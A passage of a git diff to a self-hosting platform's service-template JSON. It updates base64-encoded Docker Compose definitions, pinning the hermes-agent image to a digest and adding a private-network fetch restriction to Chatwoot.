pZGVraXEKICAgICAgLSAnLUMnCiAgICAgIC0gY29uZmlnL3NpZGVraXEueW1sCiAgICB2b2x1bWVzOgogICAgICAtICdyYWlscy1kYXRhOi9hcHAvc3RvcmFnZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAiYnVuZGxlIGV4ZWMgcmFpbHMgcnVubmVyICdwdXRzIFNpZGVraXEucmVkaXMoJjppbmZvKScgPiAvZGV2L251bGwgMj4mMSIKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwZ3ZlY3Rvci9wZ3ZlY3RvcjpwZzEyJwogICAgcmVzdGFydDogYWx3YXlzCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlcy1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1jaGF0d29vdH0nCiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkU0VSVklDRV9VU0VSX1BPU1RHUkVTIC1kIGNoYXR3b290IC1oIDEyNy4wLjAuMScKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczphbHBpbmUnCiAgICByZXN0YXJ0OiBhbHdheXMKICAgIGNvbW1hbmQ6CiAgICAgIC0gc2gKICAgICAgLSAnLWMnCiAgICAgIC0gJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICIkU0VSVklDRV9QQVNTV09SRF9SRURJUyInCiAgICB2b2x1bWVzOgogICAgICAtICdyZWRpcy1kYXRhOi9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHJlZGlzLWNsaQogICAgICAgIC0gJy1hJwogICAgICAgIC0gJFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMKICAgICAgICAtIFBJTkcKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "chatwoot",
             "chat",
@@ -2024,7 +2024,7 @@
     "hermes-agent-with-webui": {
         "documentation": "https://github.com/nesquena/hermes-webui?utm_source=coolify.io",
         "slogan": "Hermes Agent \u2014 autonomous AI agent with persistent memory, scheduling, and a self-hosted web chat UI.",
-        "compose": "c2VydmljZXM6CiAgaGVybWVzLWFnZW50OgogICAgaW1hZ2U6ICdub3VzcmVzZWFyY2gvaGVybWVzLWFnZW50OnNoYS0yNzNmZjVjNGE0N2FmNDQ5OWJiZTVlM2IxMTM5ZWZkMzEzOTk1NTU0JwogICAgY29tbWFuZDogJ2dhdGV3YXkgcnVuJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSEVSTUVTX0hPTUU9L2hvbWUvaGVybWVzLy5oZXJtZXMKICAgICAgLSBIRVJNRVNfVUlEPTEwMDAKICAgICAgLSBIRVJNRVNfR0lEPTEwMDAKICAgICAgLSAnT1BFTlJPVVRFUl9BUElfS0VZPSR7T1BFTlJPVVRFUl9BUElfS0VZfScKICAgICAgLSAnQU5USFJPUElDX0FQSV9LRVk9JHtBTlRIUk9QSUNfQVBJX0tFWX0nCiAgICAgIC0gJ09QRU5BSV9BUElfS0VZPSR7T1BFTkFJX0FQSV9LRVl9JwogICAgICAtICdHT09HTEVfQVBJX0tFWT0ke0dPT0dMRV9BUElfS0VZfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hlcm1lcy1ob21lOi9ob21lL2hlcm1lcy8uaGVybWVzJwogICAgICAtICdoZXJtZXMtYWdlbnQtc3JjOi9vcHQvaGVybWVzJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd0ZXN0IC1kIC9ob21lL2hlcm1lcy8uaGVybWVzIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgaGVybWVzLXdlYnVpOgogICAgaW1hZ2U6ICdnaGNyLmlvL25lc3F1ZW5hL2hlcm1lcy13ZWJ1aTowLjUxLjkyJwogICAgZGVwZW5kc19vbjoKICAgICAgLSBoZXJtZXMtYWdlbnQKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0hFUk1FU1dFQlVJXzg3ODcKICAgICAgLSBIRVJNRVNfV0VCVUlfSE9TVD0wLjAuMC4wCiAgICAgIC0gSEVSTUVTX1dFQlVJX1BPUlQ9ODc4NwogICAgICAtIEhFUk1FU19XRUJVSV9TVEFURV9ESVI9L2hvbWUvaGVybWVzd2VidWkvLmhlcm1lcy93ZWJ1aQogICAgICAtIFdBTlRFRF9VSUQ9MTAwMAogICAgICAtIFdBTlRFRF9HSUQ9MTAwMAogICAgICAtICdIRVJNRVNfV0VCVUlfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0hFUk1FU1dFQlVJfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hlcm1lcy1ob21lOi9ob21lL2hlcm1lc3dlYnVpLy5oZXJtZXMnCiAgICAgIC0gJ2hlcm1lcy1hZ2VudC1zcmM6L2hvbWUvaGVybWVzd2VidWkvLmhlcm1lcy9oZXJtZXMtYWdlbnQ6cm8nCiAgICAgIC0gJ2hlcm1lcy13b3Jrc3BhY2U6L3dvcmtzcGFjZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo4Nzg3L2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAzCg==",
+        "compose": "c2VydmljZXM6CiAgaGVybWVzLWFnZW50OgogICAgaW1hZ2U6ICdub3VzcmVzZWFyY2gvaGVybWVzLWFnZW50QHNoYTI1NjoyZjFmMmYxNzI1ZTVkYzlhNjFjZjZhMmRlYTVhY2E1MmE3NzZlYzRkMDIyY2IyOTY3OWU2YWEzZmYzMDNlNzdhJwogICAgY29tbWFuZDogJ2dhdGV3YXkgcnVuJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSEVSTUVTX0hPTUU9L2hvbWUvaGVybWVzLy5oZXJtZXMKICAgICAgLSBIRVJNRVNfVUlEPTEwMDAKICAgICAgLSBIRVJNRVNfR0lEPTEwMDAKICAgICAgLSAnT1BFTlJPVVRFUl9BUElfS0VZPSR7T1BFTlJPVVRFUl9BUElfS0VZfScKICAgICAgLSAnQU5USFJPUElDX0FQSV9LRVk9JHtBTlRIUk9QSUNfQVBJX0tFWX0nCiAgICAgIC0gJ09QRU5BSV9BUElfS0VZPSR7T1BFTkFJX0FQSV9LRVl9JwogICAgICAtICdHT09HTEVfQVBJX0tFWT0ke0dPT0dMRV9BUElfS0VZfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hlcm1lcy1ob21lOi9ob21lL2hlcm1lcy8uaGVybWVzJwogICAgICAtICdoZXJtZXMtYWdlbnQtc3JjOi9vcHQvaGVybWVzJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd0ZXN0IC1kIC9ob21lL2hlcm1lcy8uaGVybWVzIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgaGVybWVzLXdlYnVpOgogICAgaW1hZ2U6ICdnaGNyLmlvL25lc3F1ZW5hL2hlcm1lcy13ZWJ1aTowLjUxLjkyJwogICAgZGVwZW5kc19vbjoKICAgICAgLSBoZXJtZXMtYWdlbnQKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0hFUk1FU1dFQlVJXzg3ODcKICAgICAgLSBIRVJNRVNfV0VCVUlfSE9TVD0wLjAuMC4wCiAgICAgIC0gSEVSTUVTX1dFQlVJX1BPUlQ9ODc4NwogICAgICAtIEhFUk1FU19XRUJVSV9TVEFURV9ESVI9L2hvbWUvaGVybWVzd2VidWkvLmhlcm1lcy93ZWJ1aQogICAgICAtIFdBTlRFRF9VSUQ9MTAwMAogICAgICAtIFdBTlRFRF9HSUQ9MTAwMAogICAgICAtICdIRVJNRVNfV0VCVUlfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0hFUk1FU1dFQlVJfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hlcm1lcy1ob21lOi9ob21lL2hlcm1lc3dlYnVpLy5oZXJtZXMnCiAgICAgIC0gJ2hlcm1lcy1hZ2VudC1zcmM6L2hvbWUvaGVybWVzd2VidWkvLmhlcm1lcy9oZXJtZXMtYWdlbnQ6cm8nCiAgICAgIC0gJ2hlcm1lcy13b3Jrc3BhY2U6L3dvcmtzcGFjZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo4Nzg3L2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAzCg==",
         "tags": [
             "ai",
             "agent",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index b07fe0511..699b97e55 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -527,7 +527,7 @@
     "chatwoot": {
         "documentation": "https://www.chatwoot.com/docs/self-hosted/?utm_source=coolify.io",
         "slogan": "Delightful customer relationships at scale.",
-        "compose": "c2VydmljZXM6CiAgY2hhdHdvb3Q6CiAgICBpbWFnZTogJ2NoYXR3b290L2NoYXR3b290OmxhdGVzdCcKICAgIGRlcGVuZHNfb246CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSByZWRpcwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0NIQVRXT09UXzMwMDAKICAgICAgLSBTRUNSRVRfS0VZX0JBU0U9JFNFUlZJQ0VfUEFTU1dPUkRfQ0hBVFdPT1QKICAgICAgLSAnRlJPTlRFTkRfVVJMPSR7U0VSVklDRV9GUUROX0NIQVRXT09UfScKICAgICAgLSAnREVGQVVMVF9MT0NBTEU9JHtDSEFUV09PVF9ERUZBVUxUX0xPQ0FMRX0nCiAgICAgIC0gJ0ZPUkNFX1NTTD0ke0ZPUkNFX1NTTDotZmFsc2V9JwogICAgICAtICdFTkFCTEVfQUNDT1VOVF9TSUdOVVA9JHtFTkFCTEVfQUNDT1VOVF9TSUdOVVA6LWZhbHNlfScKICAgICAgLSAnUkVESVNfVVJMPXJlZGlzOi8vZGVmYXVsdEByZWRpczo2Mzc5JwogICAgICAtIFJFRElTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgIC0gJ1JFRElTX09QRU5TU0xfVkVSSUZZX01PREU9JHtSRURJU19PUEVOU1NMX1ZFUklGWV9NT0RFOi1ub25lfScKICAgICAgLSAnUE9TVEdSRVNfREFUQUJBU0U9JHtQT1NUR1JFU19EQjotY2hhdHdvb3R9JwogICAgICAtICdQT1NUR1JFU19IT1NUPSR7UE9TVEdSRVNfSE9TVDotcG9zdGdyZXN9JwogICAgICAtIFBPU1RHUkVTX1VTRVJOQU1FPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdSQUlMU19NQVhfVEhSRUFEUz0ke1JBSUxTX01BWF9USFJFQURTOi01fScKICAgICAgLSAnTk9ERV9FTlY9JHtOT0RFX0VOVjotcHJvZHVjdGlvbn0nCiAgICAgIC0gJ1JBSUxTX0VOVj0ke1JBSUxTX0VOVjotcHJvZHVjdGlvbn0nCiAgICAgIC0gJ0lOU1RBTExBVElPTl9FTlY9JHtJTlNUQUxMQVRJT05fRU5WOi1kb2NrZXJ9JwogICAgICAtICdNQUlMRVJfU0VOREVSX0VNQUlMPSR7Q0hBVFdPT1RfTUFJTEVSX1NFTkRFUl9FTUFJTH0nCiAgICAgIC0gJ1NNVFBfQUREUkVTUz0ke0NIQVRXT09UX1NNVFBfQUREUkVTU30nCiAgICAgIC0gJ1NNVFBfQVVUSEVOVElDQVRJT049JHtDSEFUV09PVF9TTVRQX0FVVEhFTlRJQ0FUSU9OfScKICAgICAgLSAnU01UUF9ET01BSU49JHtDSEFUV09PVF9TTVRQX0RPTUFJTn0nCiAgICAgIC0gJ1NNVFBfRU5BQkxFX1NUQVJUVExTX0FVVE89JHtDSEFUV09PVF9TTVRQX0VOQUJMRV9TVEFSVFRMU19BVVRPfScKICAgICAgLSAnU01UUF9QT1JUPSR7Q0hBVFdPT1RfU01UUF9QT1JUfScKICAgICAgLSAnU01UUF9VU0VSTkFNRT0ke0NIQVRXT09UX1NNVFBfVVNFUk5BTUV9JwogICAgICAtICdTTVRQX1BBU1NXT1JEPSR7Q0hBVFdPT1RfU01UUF9QQVNTV09SRH0nCiAgICAgIC0gJ0FDVElWRV9TVE9SQUdFX1NFUlZJQ0U9JHtBQ1RJVkVfU1RPUkFHRV9TRVJWSUNFOi1sb2NhbH0nCiAgICBlbnRyeXBvaW50OiBkb2NrZXIvZW50cnlwb2ludHMvcmFpbHMuc2gKICAgIGNvbW1hbmQ6ICdzaCAtYyAiYnVuZGxlIGV4ZWMgcmFpbHMgZGI6Y2hhdHdvb3RfcHJlcGFyZSAmJiBidW5kbGUgZXhlYyByYWlscyBzIC1wIDMwMDAgLWIgMC4wLjAuMCInCiAgICB2b2x1bWVzOgogICAgICAtICdyYWlscy1kYXRhOi9hcHAvc3RvcmFnZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnLXEnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTozMDAwJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgc2lkZWtpcToKICAgIGltYWdlOiAnY2hhdHdvb3QvY2hhdHdvb3Q6bGF0ZXN0JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBwb3N0Z3JlcwogICAgICAtIHJlZGlzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRUNSRVRfS0VZX0JBU0U9JFNFUlZJQ0VfUEFTU1dPUkRfQ0hBVFdPT1QKICAgICAgLSAnRlJPTlRFTkRfVVJMPSR7U0VSVklDRV9GUUROX0NIQVRXT09UfScKICAgICAgLSAnREVGQVVMVF9MT0NBTEU9JHtDSEFUV09PVF9ERUZBVUxUX0xPQ0FMRX0nCiAgICAgIC0gJ0ZPUkNFX1NTTD0ke0ZPUkNFX1NTTDotZmFsc2V9JwogICAgICAtICdFTkFCTEVfQUNDT1VOVF9TSUdOVVA9JHtFTkFCTEVfQUNDT1VOVF9TSUdOVVA6LWZhbHNlfScKICAgICAgLSAnUkVESVNfVVJMPXJlZGlzOi8vZGVmYXVsdEByZWRpczo2Mzc5JwogICAgICAtIFJFRElTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgIC0gJ1JFRElTX09QRU5TU0xfVkVSSUZZX01PREU9JHtSRURJU19PUEVOU1NMX1ZFUklGWV9NT0RFOi1ub25lfScKICAgICAgLSAnUE9TVEdSRVNfREFUQUJBU0U9JHtQT1NUR1JFU19EQjotY2hhdHdvb3R9JwogICAgICAtICdQT1NUR1JFU19IT1NUPSR7UE9TVEdSRVNfSE9TVDotcG9zdGdyZXN9JwogICAgICAtIFBPU1RHUkVTX1VTRVJOQU1FPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdSQUlMU19NQVhfVEhSRUFEUz0ke1JBSUxTX01BWF9USFJFQURTOi01fScKICAgICAgLSAnTk9ERV9FTlY9JHtOT0RFX0VOVjotcHJvZHVjdGlvbn0nCiAgICAgIC0gJ1JBSUxTX0VOVj0ke1JBSUxTX0VOVjotcHJvZHVjdGlvbn0nCiAgICAgIC0gJ0lOU1RBTExBVElPTl9FTlY9JHtJTlNUQUxMQVRJT05fRU5WOi1kb2NrZXJ9JwogICAgICAtICdNQUlMRVJfU0VOREVSX0VNQUlMPSR7Q0hBVFdPT1RfTUFJTEVSX1NFTkRFUl9FTUFJTH0nCiAgICAgIC0gJ1NNVFBfQUREUkVTUz0ke0NIQVRXT09UX1NNVFBfQUREUkVTU30nCiAgICAgIC0gJ1NNVFBfQVVUSEVOVElDQVRJT049JHtDSEFUV09PVF9TTVRQX0FVVEhFTlRJQ0FUSU9OfScKICAgICAgLSAnU01UUF9ET01BSU49JHtDSEFUV09PVF9TTVRQX0RPTUFJTn0nCiAgICAgIC0gJ1NNVFBfRU5BQkxFX1NUQVJUVExTX0FVVE89JHtDSEFUV09PVF9TTVRQX0VOQUJMRV9TVEFSVFRMU19BVVRPfScKICAgICAgLSAnU01UUF9QT1JUPSR7Q0hBVFdPT1RfU01UUF9QT1JUfScKICAgICAgLSAnU01UUF9VU0VSTkFNRT0ke0NIQVRXT09UX1NNVFBfVVNFUk5BTUV9JwogICAgICAtICdTTVRQX1BBU1NXT1JEPSR7Q0hBVFdPT1RfU01UUF9QQVNTV09SRH0nCiAgICAgIC0gJ0FDVElWRV9TVE9SQUdFX1NFUlZJQ0U9JHtBQ1RJVkVfU1RPUkFHRV9TRVJWSUNFOi1sb2NhbH0nCiAgICBjb21tYW5kOgogICAgICAtIGJ1bmRsZQogICAgICAtIGV4ZWMKICAgICAgLSBzaWRla2lxCiAgICAgIC0gJy1DJwogICAgICAtIGNvbmZpZy9zaWRla2lxLnltbAogICAgdm9sdW1lczoKICAgICAgLSAncmFpbHMtZGF0YTovYXBwL3N0b3JhZ2UnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gImJ1bmRsZSBleGVjIHJhaWxzIHJ1bm5lciAncHV0cyBTaWRla2lxLnJlZGlzKCY6aW5mbyknID4gL2Rldi9udWxsIDI+JjEiCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncGd2ZWN0b3IvcGd2ZWN0b3I6cGcxMicKICAgIHJlc3RhcnQ6IGFsd2F5cwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXMtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotY2hhdHdvb3R9JwogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUyAtZCBjaGF0d29vdCAtaCAxMjcuMC4wLjEnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDUKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6YWxwaW5lJwogICAgcmVzdGFydDogYWx3YXlzCiAgICBjb21tYW5kOgogICAgICAtIHNoCiAgICAgIC0gJy1jJwogICAgICAtICdyZWRpcy1zZXJ2ZXIgLS1yZXF1aXJlcGFzcyAiJFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMiJwogICAgdm9sdW1lczoKICAgICAgLSAncmVkaXMtZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtICctYScKICAgICAgICAtICRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgICAgLSBQSU5HCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDUK",
+        "compose": "c2VydmljZXM6CiAgY2hhdHdvb3Q6CiAgICBpbWFnZTogJ2NoYXR3b290L2NoYXR3b290OmxhdGVzdCcKICAgIGRlcGVuZHNfb246CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSByZWRpcwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0NIQVRXT09UXzMwMDAKICAgICAgLSBTRUNSRVRfS0VZX0JBU0U9JFNFUlZJQ0VfUEFTU1dPUkRfQ0hBVFdPT1QKICAgICAgLSAnRlJPTlRFTkRfVVJMPSR7U0VSVklDRV9GUUROX0NIQVRXT09UfScKICAgICAgLSAnREVGQVVMVF9MT0NBTEU9JHtDSEFUV09PVF9ERUZBVUxUX0xPQ0FMRX0nCiAgICAgIC0gJ0ZPUkNFX1NTTD0ke0ZPUkNFX1NTTDotZmFsc2V9JwogICAgICAtICdFTkFCTEVfQUNDT1VOVF9TSUdOVVA9JHtFTkFCTEVfQUNDT1VOVF9TSUdOVVA6LWZhbHNlfScKICAgICAgLSAnUkVESVNfVVJMPXJlZGlzOi8vZGVmYXVsdEByZWRpczo2Mzc5JwogICAgICAtIFJFRElTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgIC0gJ1JFRElTX09QRU5TU0xfVkVSSUZZX01PREU9JHtSRURJU19PUEVOU1NMX1ZFUklGWV9NT0RFOi1ub25lfScKICAgICAgLSAnUE9TVEdSRVNfREFUQUJBU0U9JHtQT1NUR1JFU19EQjotY2hhdHdvb3R9JwogICAgICAtICdQT1NUR1JFU19IT1NUPSR7UE9TVEdSRVNfSE9TVDotcG9zdGdyZXN9JwogICAgICAtIFBPU1RHUkVTX1VTRVJOQU1FPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdSQUlMU19NQVhfVEhSRUFEUz0ke1JBSUxTX01BWF9USFJFQURTOi01fScKICAgICAgLSAnTk9ERV9FTlY9JHtOT0RFX0VOVjotcHJvZHVjdGlvbn0nCiAgICAgIC0gJ1JBSUxTX0VOVj0ke1JBSUxTX0VOVjotcHJvZHVjdGlvbn0nCiAgICAgIC0gJ0lOU1RBTExBVElPTl9FTlY9JHtJTlNUQUxMQVRJT05fRU5WOi1kb2NrZXJ9JwogICAgICAtICdNQUlMRVJfU0VOREVSX0VNQUlMPSR7Q0hBVFdPT1RfTUFJTEVSX1NFTkRFUl9FTUFJTH0nCiAgICAgIC0gJ1NNVFBfQUREUkVTUz0ke0NIQVRXT09UX1NNVFBfQUREUkVTU30nCiAgICAgIC0gJ1NNVFBfQVVUSEVOVElDQVRJT049JHtDSEFUV09PVF9TTVRQX0FVVEhFTlRJQ0FUSU9OfScKICAgICAgLSAnU01UUF9ET01BSU49JHtDSEFUV09PVF9TTVRQX0RPTUFJTn0nCiAgICAgIC0gJ1NNVFBfRU5BQkxFX1NUQVJUVExTX0FVVE89JHtDSEFUV09PVF9TTVRQX0VOQUJMRV9TVEFSVFRMU19BVVRPfScKICAgICAgLSAnU01UUF9QT1JUPSR7Q0hBVFdPT1RfU01UUF9QT1JUfScKICAgICAgLSAnU01UUF9VU0VSTkFNRT0ke0NIQVRXT09UX1NNVFBfVVNFUk5BTUV9JwogICAgICAtICdTTVRQX1BBU1NXT1JEPSR7Q0hBVFdPT1RfU01UUF9QQVNTV09SRH0nCiAgICAgIC0gJ0FDVElWRV9TVE9SQUdFX1NFUlZJQ0U9JHtBQ1RJVkVfU1RPUkFHRV9TRVJWSUNFOi1sb2NhbH0nCiAgICAgIC0gJ1NBRkVfRkVUQ0hfQUxMT1dfUFJJVkFURV9ORVRXT1JLPSR7U0FGRV9GRVRDSF9BTExPV19QUklWQVRFX05FVFdPUks6LWZhbHNlfScKICAgIGVudHJ5cG9pbnQ6IGRvY2tlci9lbnRyeXBvaW50cy9yYWlscy5zaAogICAgY29tbWFuZDogJ3NoIC1jICJidW5kbGUgZXhlYyByYWlscyBkYjpjaGF0d29vdF9wcmVwYXJlICYmIGJ1bmRsZSBleGVjIHJhaWxzIHMgLXAgMzAwMCAtYiAwLjAuMC4wIicKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JhaWxzLWRhdGE6L2FwcC9zdG9yYWdlJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICctcScKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBzaWRla2lxOgogICAgaW1hZ2U6ICdjaGF0d29vdC9jaGF0d29vdDpsYXRlc3QnCiAgICBkZXBlbmRzX29uOgogICAgICAtIHBvc3RncmVzCiAgICAgIC0gcmVkaXMKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFQ1JFVF9LRVlfQkFTRT0kU0VSVklDRV9QQVNTV09SRF9DSEFUV09PVAogICAgICAtICdGUk9OVEVORF9VUkw9JHtTRVJWSUNFX0ZRRE5fQ0hBVFdPT1R9JwogICAgICAtICdERUZBVUxUX0xPQ0FMRT0ke0NIQVRXT09UX0RFRkFVTFRfTE9DQUxFfScKICAgICAgLSAnRk9SQ0VfU1NMPSR7Rk9SQ0VfU1NMOi1mYWxzZX0nCiAgICAgIC0gJ0VOQUJMRV9BQ0NPVU5UX1NJR05VUD0ke0VOQUJMRV9BQ0NPVU5UX1NJR05VUDotZmFsc2V9JwogICAgICAtICdSRURJU19VUkw9cmVkaXM6Ly9kZWZhdWx0QHJlZGlzOjYzNzknCiAgICAgIC0gUkVESVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMKICAgICAgLSAnUkVESVNfT1BFTlNTTF9WRVJJRllfTU9ERT0ke1JFRElTX09QRU5TU0xfVkVSSUZZX01PREU6LW5vbmV9JwogICAgICAtICdQT1NUR1JFU19EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1jaGF0d29vdH0nCiAgICAgIC0gJ1BPU1RHUkVTX0hPU1Q9JHtQT1NUR1JFU19IT1NUOi1wb3N0Z3Jlc30nCiAgICAgIC0gUE9TVEdSRVNfVVNFUk5BTUU9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gJ1JBSUxTX01BWF9USFJFQURTPSR7UkFJTFNfTUFYX1RIUkVBRFM6LTV9JwogICAgICAtICdOT0RFX0VOVj0ke05PREVfRU5WOi1wcm9kdWN0aW9ufScKICAgICAgLSAnUkFJTFNfRU5WPSR7UkFJTFNfRU5WOi1wcm9kdWN0aW9ufScKICAgICAgLSAnSU5TVEFMTEFUSU9OX0VOVj0ke0lOU1RBTExBVElPTl9FTlY6LWRvY2tlcn0nCiAgICAgIC0gJ01BSUxFUl9TRU5ERVJfRU1BSUw9JHtDSEFUV09PVF9NQUlMRVJfU0VOREVSX0VNQUlMfScKICAgICAgLSAnU01UUF9BRERSRVNTPSR7Q0hBVFdPT1RfU01UUF9BRERSRVNTfScKICAgICAgLSAnU01UUF9BVVRIRU5USUNBVElPTj0ke0NIQVRXT09UX1NNVFBfQVVUSEVOVElDQVRJT059JwogICAgICAtICdTTVRQX0RPTUFJTj0ke0NIQVRXT09UX1NNVFBfRE9NQUlOfScKICAgICAgLSAnU01UUF9FTkFCTEVfU1RBUlRUTFNfQVVUTz0ke0NIQVRXT09UX1NNVFBfRU5BQkxFX1NUQVJUVExTX0FVVE99JwogICAgICAtICdTTVRQX1BPUlQ9JHtDSEFUV09PVF9TTVRQX1BPUlR9JwogICAgICAtICdTTVRQX1VTRVJOQU1FPSR7Q0hBVFdPT1RfU01UUF9VU0VSTkFNRX0nCiAgICAgIC0gJ1NNVFBfUEFTU1dPUkQ9JHtDSEFUV09PVF9TTVRQX1BBU1NXT1JEfScKI